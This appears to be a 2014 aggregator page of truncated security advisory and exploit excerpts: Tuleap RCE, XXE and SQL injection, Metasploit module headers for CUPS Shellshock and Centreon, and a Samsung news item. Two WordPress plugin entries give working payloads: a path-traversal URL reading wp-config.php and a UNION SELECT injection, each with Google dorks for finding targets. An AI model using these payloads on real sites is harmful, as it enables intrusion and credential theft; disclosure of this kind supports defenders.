NuevoLabs flash player for clipshare SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nuevoplayer is a popular flash video player with integration into multiple popular video sharing suites. The most
notable is Clipshare (clip-share.com). Nuevoplayer provides flash video playing capabilities to third party video
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...


Tuleap 7.4.99.5 Remote Command Execution

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to check whether the request passed to the passthru() function introduces any extra parameters that would be executed in the context of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application, which would execute them, as shown in the attached Proof of Concept code below.
 
After registering with the application...


Tuleap 7.2 XXE Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
Multiple XML External Entity Injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as a PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload an XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...


Tuleap 7.4.99.5 Blind SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...


CUPS Filter Bash Environment Variable Code Injection

28 October 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas',...


New exploit for Samsung devices allows remote control of the device

28 October 2014 - Source: http://www.techzilla.it

If we own a Samsung device and use the "Find My Mobile" feature, it may be wise to disable it for the time being. The warning comes both from NIST (National Institute of Standards and Technology) and from researcher Mohamed Baset, who report an exploit that allows a Samsung device to be locked, rung or wiped remotely.

Apparently the application does not check the lock-code information it receives, and an attacker can send data traffic to take...


WordPress Download Manager Arbitrary File Download

28 October 2014 - Source: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find a website that uses /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php


...


WordPress HTML5 / Flash Player SQL Injection

28 October 2014 - Source: http://www.mondounix.com
# WordPress HTML5 and Flash Player Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...


Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability

24 October 2014 - Source: http://www.mondounix.com
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
 
Release Date:
=============
2014-10-21
 
Vulnerability Laboratory ID (VL-ID):
====================================
1222
 
Common Vulnerability Scoring System:
====================================
3
 
Product & Service Introduction:
===============================
Dell SonicWALL's management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from...


Centreon SQL / Command Injection

24 October 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Centreon SQL and Command Injection',
      'Description'    => %q{
        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
        Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
        injection in the displayServiceStatus.php component, it is possible to execute arbitrary
 ...
